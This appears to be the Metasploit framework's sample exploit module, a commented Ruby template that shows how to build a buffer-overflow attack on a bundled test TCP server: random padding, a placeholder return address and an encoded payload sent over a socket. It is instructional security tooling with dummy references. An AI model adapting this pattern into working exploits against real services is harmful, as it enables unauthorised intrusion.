Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
###
7
#
8
# This exploit sample shows how an exploit module could be written to exploit
9
# a bug in an arbitrary TCP server.
10
#
11
###
12
class MetasploitModule < Msf::Exploit::Remote
13
  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
14

15
  #
16
  # This exploit affects TCP servers, so we use the TCP client mixin.
17
  # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
18
  # vulnerable target program.
19
  #
20
  include Exploit::Remote::Tcp
21

22
  def initialize(info = {})
23
    super(
24
      update_info(
25
        info,
26
        # The Name should be just like the line of a Git commit - software name,
27
        # vuln type, class. Preferably apply
28
        # some search optimization so people can actually find the module.
29
        # We encourage consistency between module name and file name.
30
        'Name' => 'Sample Exploit',
31
        'Description' => %q{
32
          This exploit module illustrates how a vulnerability could be exploited
33
          in an TCP server that has a parsing bug.
34
        },
35
        'License' => MSF_LICENSE,
36
        'Author' => ['skape'],
37
        'References' => [
38
          [ 'OSVDB', '12345' ],
39
          [ 'EDB', '12345' ],
40
          [ 'URL', 'http://www.example.com'],
41
          [ 'CVE', '1978-1234']
42
        ],
43
        'Payload' => {
44
          'Space' => 1000,
45
          'BadChars' => "\x00"
46
        },
47
        'Targets' => [
48
          # Target 0: Windows All
49
          [
50
            'Windows XP/Vista/7/8',
51
            {
52
              'Platform' => 'win',
53
              'Ret' => 0x41424344
54
            }
55
          ]
56
        ],
57
        'DisclosureDate' => '2020-12-30',
58
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
59
        # It's generally easiest just to put the default at the beginning of the list and skip this
60
        # entirely.
61
        'DefaultTarget' => 0,
62
        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
63
        'Notes' => {
64
          'Stability' => [],
65
          'Reliability' => [],
66
          'SideEffects' => []
67
        }
68
      )
69
    )
70
  end
71

72
  #
73
  # The sample exploit just indicates that the remote host is always
74
  # vulnerable.
75
  #
76
  def check
77
    CheckCode::Vulnerable
78
  end
79

80
  #
81
  # The exploit method connects to the remote service and sends 1024 random bytes
82
  # followed by the fake return address and then the payload.
83
  #
84
  def exploit
85
    connect
86

87
    print_status("Sending #{payload.encoded.length} byte payload...")
88

89
    # Build the buffer for transmission
90
    buf = rand_text_alpha(1024)
91
    buf << [ target.ret ].pack('V')
92
    buf << payload.encoded
93

94
    # Send it off
95
    sock.put(buf)
96
    sock.get_once
97

98
    handler
99
  end
100
end
101

102